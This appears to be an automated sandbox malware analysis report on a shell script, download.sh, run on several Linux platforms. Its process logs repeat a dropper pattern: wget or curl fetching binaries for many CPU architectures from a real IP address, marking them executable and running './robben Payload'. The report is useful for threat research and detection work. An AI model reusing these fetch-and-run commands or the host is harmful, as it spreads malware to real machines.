Malware Analysis Report

2025-01-23 14:01

Sample ID 240822-1rlyhszdld
Target download.sh
SHA256 19ae1084b4322732191f0325600ae869eb0527f11e5b2c2a7095fe14adaa1902
Tags
antivm
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

19ae1084b4322732191f0325600ae869eb0527f11e5b2c2a7095fe14adaa1902

Threat Level: Shows suspicious behavior

The file download.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

antivm

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-22 21:53

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-22 21:53

Reported

2024-08-23 00:32

Platform

debian12-mipsel-20240221-en

Max time kernel

85s

Max time network

90s

Command Line

[/tmp/download.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/download.sh N/A

Processes

/tmp/download.sh

[/tmp/download.sh]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/usr/bin/cat

[cat x86_64]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-82170dcea2b744dd92f83c5a7aa4eccb-systemd-logind.service-gUMMDR]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/usr/bin/cat

[cat mips]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-82170dcea2b744dd92f83c5a7aa4eccb-systemd-logind.service-gUMMDR]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/usr/bin/cat

[cat mipsel]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-82170dcea2b744dd92f83c5a7aa4eccb-systemd-logind.service-gUMMDR]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/usr/bin/cat

[cat arm]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-82170dcea2b744dd92f83c5a7aa4eccb-systemd-logind.service-gUMMDR]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/usr/bin/cat

[cat arm5]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-82170dcea2b744dd92f83c5a7aa4eccb-systemd-logind.service-gUMMDR]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm6]

/usr/bin/cat

[cat arm6]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-82170dcea2b744dd92f83c5a7aa4eccb-systemd-logind.service-gUMMDR]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm7]

/usr/bin/cat

[cat arm7]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-82170dcea2b744dd92f83c5a7aa4eccb-systemd-logind.service-gUMMDR]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/spc]

/usr/bin/cat

[cat spc]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-82170dcea2b744dd92f83c5a7aa4eccb-systemd-logind.service-gUMMDR]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/sh4]

/usr/bin/cat

[cat sh4]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-82170dcea2b744dd92f83c5a7aa4eccb-systemd-logind.service-gUMMDR]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i586]

/usr/bin/cat

[cat i586]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-82170dcea2b744dd92f83c5a7aa4eccb-systemd-logind.service-gUMMDR]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i686]

/usr/bin/cat

[cat i686]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-82170dcea2b744dd92f83c5a7aa4eccb-systemd-logind.service-gUMMDR]

/tmp/robben

[./robben Payload]

Network

Country  Destination         Domain                          Proto
US       158.51.127.106:80                                   tcp
US       1.1.1.1:53          debian12-mipsel-20240221-en-14  udp
US       1.1.1.1:53          debian12-mipsel-20240221-en-14  udp
US       1.1.1.1:53          debian12-mipsel-20240221-en-14  udp
US       1.1.1.1:53          debian12-mipsel-20240221-en-14  udp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-08-22 21:53

Reported

2024-08-23 00:52

Platform

debian9-armhf-20240611-en

Max time kernel

84s

Max time network

85s

Command Line

[/tmp/download.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Checks CPU configuration

antivm

Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/download.sh N/A

Processes

/tmp/download.sh

[/tmp/download.sh]

/usr/bin/wget

[wget http://158.51.127.106/bins/x86_64]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/bin/cat

[cat x86_64]

/bin/chmod

[chmod +x download.sh robben systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-Qigx24]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mips]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/bin/cat

[cat mips]

/bin/chmod

[chmod +x download.sh robben systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-Qigx24]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mipsel]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/bin/cat

[cat mipsel]

/bin/chmod

[chmod +x download.sh robben systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-Qigx24]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/bin/cat

[cat arm]

/bin/chmod

[chmod +x download.sh robben systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-Qigx24]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm5]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/bin/cat

[cat arm5]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm6]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm6]

/bin/cat

[cat arm6]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm7]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm7]

/bin/cat

[cat arm7]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/spc]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/spc]

/bin/cat

[cat spc]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/sh4]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/sh4]

/bin/cat

[cat sh4]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i586]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i586]

/bin/cat

[cat i586]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i686]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i686]

/bin/cat

[cat i686]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

Network

Country  Destination         Domain                          Proto
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp

Files

memory/837-1-0xb66e8000-0xb66f9044-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2024-08-22 21:53

Reported

2024-08-23 00:55

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

69s

Max time network

479s

Command Line

[/tmp/download.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/download.sh N/A

Processes

/tmp/download.sh

[/tmp/download.sh]

/usr/bin/wget

[wget http://158.51.127.106/bins/x86_64]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/bin/cat

[cat x86_64]

/bin/chmod

[chmod +x config-err-eBgUu0 download.sh netplan_lclepcne robben snap-private-tmp ssh-w2DkUwMvVabC systemd-private-c8662c6176344cfb8cfaf89749cac76c-bolt.service-6G729x systemd-private-c8662c6176344cfb8cfaf89749cac76c-colord.service-AEFPDD systemd-private-c8662c6176344cfb8cfaf89749cac76c-ModemManager.service-66xRkY systemd-private-c8662c6176344cfb8cfaf89749cac76c-systemd-resolved.service-YkivNc systemd-private-c8662c6176344cfb8cfaf89749cac76c-systemd-timedated.service-ZPDt04]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mips]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/bin/cat

[cat mips]

/bin/chmod

[chmod +x config-err-eBgUu0 download.sh netplan_lclepcne robben snap-private-tmp ssh-w2DkUwMvVabC systemd-private-c8662c6176344cfb8cfaf89749cac76c-bolt.service-6G729x systemd-private-c8662c6176344cfb8cfaf89749cac76c-colord.service-AEFPDD systemd-private-c8662c6176344cfb8cfaf89749cac76c-ModemManager.service-66xRkY systemd-private-c8662c6176344cfb8cfaf89749cac76c-systemd-resolved.service-YkivNc systemd-private-c8662c6176344cfb8cfaf89749cac76c-systemd-timedated.service-ZPDt04]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mipsel]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/bin/cat

[cat mipsel]

/bin/chmod

[chmod +x config-err-eBgUu0 download.sh netplan_lclepcne robben snap-private-tmp ssh-w2DkUwMvVabC systemd-private-c8662c6176344cfb8cfaf89749cac76c-bolt.service-6G729x systemd-private-c8662c6176344cfb8cfaf89749cac76c-colord.service-AEFPDD systemd-private-c8662c6176344cfb8cfaf89749cac76c-ModemManager.service-66xRkY systemd-private-c8662c6176344cfb8cfaf89749cac76c-systemd-resolved.service-YkivNc systemd-private-c8662c6176344cfb8cfaf89749cac76c-systemd-timedated.service-ZPDt04]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/bin/cat

[cat arm]

/bin/chmod

[chmod +x config-err-eBgUu0 download.sh netplan_lclepcne robben snap-private-tmp ssh-w2DkUwMvVabC systemd-private-c8662c6176344cfb8cfaf89749cac76c-bolt.service-6G729x systemd-private-c8662c6176344cfb8cfaf89749cac76c-colord.service-AEFPDD systemd-private-c8662c6176344cfb8cfaf89749cac76c-ModemManager.service-66xRkY systemd-private-c8662c6176344cfb8cfaf89749cac76c-systemd-resolved.service-YkivNc systemd-private-c8662c6176344cfb8cfaf89749cac76c-systemd-timedated.service-ZPDt04]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm5]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/bin/cat

[cat arm5]

/bin/chmod

[chmod +x config-err-eBgUu0 download.sh netplan_lclepcne robben snap-private-tmp ssh-w2DkUwMvVabC systemd-private-c8662c6176344cfb8cfaf89749cac76c-bolt.service-6G729x systemd-private-c8662c6176344cfb8cfaf89749cac76c-colord.service-AEFPDD systemd-private-c8662c6176344cfb8cfaf89749cac76c-ModemManager.service-66xRkY systemd-private-c8662c6176344cfb8cfaf89749cac76c-systemd-resolved.service-YkivNc]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm6]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm6]

/bin/cat

[cat arm6]

/bin/chmod

[chmod +x config-err-eBgUu0 download.sh netplan_lclepcne robben snap-private-tmp ssh-w2DkUwMvVabC systemd-private-c8662c6176344cfb8cfaf89749cac76c-bolt.service-6G729x systemd-private-c8662c6176344cfb8cfaf89749cac76c-colord.service-AEFPDD systemd-private-c8662c6176344cfb8cfaf89749cac76c-ModemManager.service-66xRkY systemd-private-c8662c6176344cfb8cfaf89749cac76c-systemd-resolved.service-YkivNc]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm7]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm7]

/bin/cat

[cat arm7]

/bin/chmod

[chmod +x config-err-eBgUu0 download.sh netplan_lclepcne robben snap-private-tmp ssh-w2DkUwMvVabC systemd-private-c8662c6176344cfb8cfaf89749cac76c-bolt.service-6G729x systemd-private-c8662c6176344cfb8cfaf89749cac76c-colord.service-AEFPDD systemd-private-c8662c6176344cfb8cfaf89749cac76c-ModemManager.service-66xRkY systemd-private-c8662c6176344cfb8cfaf89749cac76c-systemd-resolved.service-YkivNc]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/spc]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/spc]

/bin/cat

[cat spc]

/bin/chmod

[chmod +x config-err-eBgUu0 download.sh netplan_lclepcne robben snap-private-tmp ssh-w2DkUwMvVabC systemd-private-c8662c6176344cfb8cfaf89749cac76c-bolt.service-6G729x systemd-private-c8662c6176344cfb8cfaf89749cac76c-colord.service-AEFPDD systemd-private-c8662c6176344cfb8cfaf89749cac76c-ModemManager.service-66xRkY systemd-private-c8662c6176344cfb8cfaf89749cac76c-systemd-resolved.service-YkivNc]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/sh4]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/sh4]

/bin/cat

[cat sh4]

/bin/chmod

[chmod +x config-err-eBgUu0 download.sh netplan_lclepcne robben snap-private-tmp ssh-w2DkUwMvVabC systemd-private-c8662c6176344cfb8cfaf89749cac76c-bolt.service-6G729x systemd-private-c8662c6176344cfb8cfaf89749cac76c-colord.service-AEFPDD systemd-private-c8662c6176344cfb8cfaf89749cac76c-ModemManager.service-66xRkY systemd-private-c8662c6176344cfb8cfaf89749cac76c-systemd-resolved.service-YkivNc]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i586]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i586]

/bin/cat

[cat i586]

/bin/chmod

[chmod +x config-err-eBgUu0 download.sh netplan_lclepcne robben snap-private-tmp ssh-w2DkUwMvVabC systemd-private-c8662c6176344cfb8cfaf89749cac76c-bolt.service-6G729x systemd-private-c8662c6176344cfb8cfaf89749cac76c-colord.service-AEFPDD systemd-private-c8662c6176344cfb8cfaf89749cac76c-ModemManager.service-66xRkY systemd-private-c8662c6176344cfb8cfaf89749cac76c-systemd-resolved.service-YkivNc]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i686]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i686]

/bin/cat

[cat i686]

/bin/chmod

[chmod +x config-err-eBgUu0 download.sh netplan_lclepcne robben snap-private-tmp ssh-w2DkUwMvVabC systemd-private-c8662c6176344cfb8cfaf89749cac76c-bolt.service-6G729x systemd-private-c8662c6176344cfb8cfaf89749cac76c-colord.service-AEFPDD systemd-private-c8662c6176344cfb8cfaf89749cac76c-ModemManager.service-66xRkY systemd-private-c8662c6176344cfb8cfaf89749cac76c-systemd-resolved.service-YkivNc]

/tmp/robben

[./robben Payload]

Network

Country  Destination         Domain                          Proto
US       158.51.127.106:80                                   tcp
N/A      224.0.0.251:5353                                    udp
US       151.101.65.91:443                                   tcp
GB       195.181.164.19:443                                  tcp
US       158.51.127.106:80                                   tcp
GB       185.125.188.61:443                                  tcp
GB       185.125.188.61:443                                  tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       1.1.1.1:53          connectivity-check.ubuntu.com   udp
US       1.1.1.1:53          connectivity-check.ubuntu.com   udp
GB       185.125.190.97:80   connectivity-check.ubuntu.com   tcp
US       1.1.1.1:53          connectivity-check.ubuntu.com   udp
US       1.1.1.1:53          connectivity-check.ubuntu.com   udp
US       91.189.91.48:80     connectivity-check.ubuntu.com   tcp

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-08-22 21:53

Reported

2024-08-23 00:56

Platform

ubuntu2004-amd64-20240611-en

Max time kernel

83s

Max time network

478s

Command Line

[/tmp/download.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/download.sh N/A

Processes

/tmp/download.sh

[/tmp/download.sh]

/usr/bin/wget

[wget http://158.51.127.106/bins/x86_64]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/usr/bin/cat

[cat x86_64]

/usr/bin/chmod

[chmod +x config-err-DncUPG download.sh robben snap-private-tmp ssh-R1FguAXtDwge systemd-private-b0e593c6607f42e8a0803a07ba0eb743-colord.service-VArqDg systemd-private-b0e593c6607f42e8a0803a07ba0eb743-ModemManager.service-oAnasi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-switcheroo-control.service-Il0Ssj systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-logind.service-YJkB0f systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-resolved.service-KGrVXi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-timedated.service-w7bIMg systemd-private-b0e593c6607f42e8a0803a07ba0eb743-upower.service-Pc7AYh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mips]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/usr/bin/cat

[cat mips]

/usr/bin/chmod

[chmod +x config-err-DncUPG download.sh robben snap-private-tmp ssh-R1FguAXtDwge systemd-private-b0e593c6607f42e8a0803a07ba0eb743-colord.service-VArqDg systemd-private-b0e593c6607f42e8a0803a07ba0eb743-ModemManager.service-oAnasi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-switcheroo-control.service-Il0Ssj systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-logind.service-YJkB0f systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-resolved.service-KGrVXi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-timedated.service-w7bIMg systemd-private-b0e593c6607f42e8a0803a07ba0eb743-upower.service-Pc7AYh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mipsel]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/usr/bin/cat

[cat mipsel]

/usr/bin/chmod

[chmod +x config-err-DncUPG download.sh robben snap-private-tmp ssh-R1FguAXtDwge systemd-private-b0e593c6607f42e8a0803a07ba0eb743-colord.service-VArqDg systemd-private-b0e593c6607f42e8a0803a07ba0eb743-ModemManager.service-oAnasi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-switcheroo-control.service-Il0Ssj systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-logind.service-YJkB0f systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-resolved.service-KGrVXi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-upower.service-Pc7AYh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/usr/bin/cat

[cat arm]

/usr/bin/chmod

[chmod +x config-err-DncUPG download.sh robben snap-private-tmp ssh-R1FguAXtDwge systemd-private-b0e593c6607f42e8a0803a07ba0eb743-colord.service-VArqDg systemd-private-b0e593c6607f42e8a0803a07ba0eb743-ModemManager.service-oAnasi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-switcheroo-control.service-Il0Ssj systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-logind.service-YJkB0f systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-resolved.service-KGrVXi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-upower.service-Pc7AYh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm5]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/usr/bin/cat

[cat arm5]

/usr/bin/chmod

[chmod +x config-err-DncUPG download.sh robben snap-private-tmp ssh-R1FguAXtDwge systemd-private-b0e593c6607f42e8a0803a07ba0eb743-colord.service-VArqDg systemd-private-b0e593c6607f42e8a0803a07ba0eb743-ModemManager.service-oAnasi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-switcheroo-control.service-Il0Ssj systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-logind.service-YJkB0f systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-resolved.service-KGrVXi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-upower.service-Pc7AYh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm6]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm6]

/usr/bin/cat

[cat arm6]

/usr/bin/chmod

[chmod +x config-err-DncUPG download.sh robben snap-private-tmp ssh-R1FguAXtDwge systemd-private-b0e593c6607f42e8a0803a07ba0eb743-colord.service-VArqDg systemd-private-b0e593c6607f42e8a0803a07ba0eb743-ModemManager.service-oAnasi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-switcheroo-control.service-Il0Ssj systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-logind.service-YJkB0f systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-resolved.service-KGrVXi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-upower.service-Pc7AYh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm7]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm7]

/usr/bin/cat

[cat arm7]

/usr/bin/chmod

[chmod +x config-err-DncUPG download.sh robben snap-private-tmp ssh-R1FguAXtDwge systemd-private-b0e593c6607f42e8a0803a07ba0eb743-colord.service-VArqDg systemd-private-b0e593c6607f42e8a0803a07ba0eb743-ModemManager.service-oAnasi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-switcheroo-control.service-Il0Ssj systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-logind.service-YJkB0f systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-resolved.service-KGrVXi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-upower.service-Pc7AYh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/spc]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/spc]

/usr/bin/cat

[cat spc]

/usr/bin/chmod

